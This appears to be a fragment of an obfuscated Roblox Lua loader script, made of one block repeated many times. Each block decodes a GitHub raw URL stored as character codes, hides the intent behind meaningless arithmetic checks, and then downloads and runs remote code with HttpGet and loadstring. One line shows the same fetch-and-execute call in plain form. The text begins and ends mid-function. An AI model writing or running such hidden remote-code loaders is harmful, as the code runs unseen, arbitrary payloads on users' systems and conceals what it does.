    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()

loadstring(game:HttpGet("https://raw.githubusercontent.com/yunjun3737-ship-it/ftap-np/main/AIPA2.lua-1-1.txt"))()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
